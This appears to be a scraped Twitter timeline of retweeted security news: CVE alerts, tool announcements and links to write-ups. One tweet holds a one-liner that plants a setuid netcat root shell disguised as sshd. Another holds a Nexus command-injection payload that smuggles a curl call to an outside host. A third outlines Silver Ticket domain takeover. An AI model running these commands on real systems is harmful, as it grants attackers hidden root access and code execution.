Tweetovi
- Tweetovi, trenutna stranica.
- Tweetovi i odgovori
- Medijski sadržaj
Blokirali ste korisnika/cu @testanull
Jeste li sigurni da želite vidjeti te tweetove? Time nećete deblokirati korisnika/cu @testanull
-
Jang proslijedio/la je Tweet
Attention CTF players (and organizers, CTFd v2.0.0 - v2.2.2 has a serious vulnerability (CVE-2020-7245) in which an attacker could perform account takeover using a leading-trailing on the Registration form. It has been fixed in v2.2.3. https://github.com/CTFd/CTFd/releases/tag/2.2.3 … Make sure to update!
Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi
-
Jang proslijedio/la je Tweet
I'm working on a new project for Android reversers called Smali Debugger. It's like gdb but for Smali. It uses smalivm (https://github.com/CalebFenton/simplify …) for execution. Here's a quick video of me stepping through two similar methods.
#AndroidSecurity#ReverseEngineeringpic.twitter.com/72Ic5PB8MKHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Jang proslijedio/la je Tweet
Big list of HTTP static server one-liners :https://gist.github.com/willurd/5720255
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Jang proslijedio/la je Tweet
【Weblogic New Unserialization RCE】 CVE-2020-2546 T3 RCE CVE-2020-2551 IIOP RCE 攻击者通过IIOP协议远程访问Weblogic 上的远程接口,默认启用,传入恶意数据,从而获取服务器权限并在未授权情况下远程执行任意代码。 http://oracle.com/security-alerts/cpujan2020.html … https://mp.weixin.qq.com/s/Q-ZtX-7vt0JnjNbBmyuG0w …pic.twitter.com/fASuCdsiIh
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Breaking PHP's mt_rand() with 2 values and no bruteforcehttps://www.ambionics.io/blog/php-mt-rand-prediction …
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Jang proslijedio/la je Tweet
I have 0 CVEs. I've found many many bugs, but I don't need a CVE to prove anything. If you seemingly think a CVE makes you l337, you need to rethink.pic.twitter.com/tLMSD4BmNH
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Jang proslijedio/la je Tweet
RT if you get it, research it if you don't: mkdir /tmp/... cd /tmp/... cp `which nc.traditional` sshd chown root:root sshd chmod u+s sshd ./sshd -l -p 2020 -e /bin/shpic.twitter.com/FeD1vfz31o
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Jang proslijedio/la je Tweet
The Secret Life of SIM Cards Writing, building, loading, and using code on SIM Cards [PDF] https://www.defcon.org/images/defcon-21/dc-21-presentations/Koscher-Butler/DEFCON-21-Koscher-Butler-The-Secret-Life-of-SIM-Cards-Updated.pdf …pic.twitter.com/3OjYCLVZRT
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Jang proslijedio/la je TweetHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi
-
Jang proslijedio/la je Tweet
I've implemented a fuzzer for PHP: https://github.com/nikic/PHP-Fuzzer … Fuzzing is a great way to find obscure bugs in parsing libraries...
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Jang proslijedio/la je Tweet
"whoopsie-daisy", part 3. This one is about PID recycling and how it can lead to a vulnerability if PIDs are accidentally used as authentication tokens. https://securitylab.github.com/research/ubuntu-apport-CVE-2019-15790 …pic.twitter.com/kcO99Murv0
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Jang proslijedio/la je Tweet
Just published a PoC exploit for CVE-2019-18935 (https://github.com/noperator/CVE-2019-18935 …), RCE via insecure deserialization affecting Telerik UI. See full write-up below. Thanks to
@mwulftange for discovering this issue, and@bao7uo for collaborating on exploit dev.https://twitter.com/bishopfox/status/1205516977793589250 …
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi
-
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi
-
Jang proslijedio/la je Tweet
VIDEO UPDATE: All 115 Briefings from
#BHUSA 2019 have been uploaded to the Black Hat YouTube channel. All videos available here:http://ow.ly/m7K830q1mvTHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Jang proslijedio/la je Tweet
The CVE-2019-18935 is a severe insecure deserialization vulnerability affecting
#Telerik UI. Understand its impact + learn to safely patch your software in this post from@noperator: https://hubs.ly/H0mf7L-0 (With thanks to@mwulftange +@bao7uo)pic.twitter.com/qHc5XoKywA
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Jang proslijedio/la je Tweet
When an attacker dumps NTDS.dit, they have user & computer hashes, including Domain Controller hashes. Create Silver Ticket w/ computer hash & regain full AD control: https://adsecurity.org/?p=2011 Mitigation: Force all computers to change pw every 1 day via GPO. More in link above
Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Jang proslijedio/la je Tweet
CVE-2019-15588 OS Command Injection in Nexus Repository Manager 2.x(bypass CVE-2019-5475) "createrepo" / "mergerepo" => /bin/bash -c curl${IFS}http://192.168.88.1:8000/ || /createrepo CVE-2019-15588 https://hackerone.com/reports/688270 CVE-2019-5475 https://hackerone.com/reports/654888 https://twitter.com/700_isnuoT/status/1203979987449237506 …pic.twitter.com/obBu2yRv44
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Jang proslijedio/la je TweetHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi
Čini se da učitavanje traje već neko vrijeme.
Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.